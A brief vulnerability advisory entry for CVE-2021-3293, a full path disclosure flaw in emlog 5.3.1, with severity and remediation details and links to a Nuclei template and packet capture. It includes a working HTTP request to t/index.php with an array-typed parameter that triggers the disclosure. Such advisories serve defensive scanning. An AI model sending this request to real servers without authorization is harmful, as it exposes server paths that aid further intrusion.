| Title | emlog 5.3.1 Path Disclosure |
|---|---|
| Author | h1ei1 |
| Severity | Medium |
| Impact | An attacker can gain knowledge of the server's file system structure, potentially leading to further attacks. |
| Remediation | Apply the latest patch or upgrade to a version that fixes the vulnerability. |
| CVSS Score | 5.3 |
| EPSS Score | 0.6791 |
| CVE ID | CVE-2021-3293 |
| CWE ID | CWE-22 |
| Tags | cve2021 cve emlog fpd vuln |
emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.
GET /t/index.php?action[]=aaaa HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3293.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-3293.pcap
N/AN/A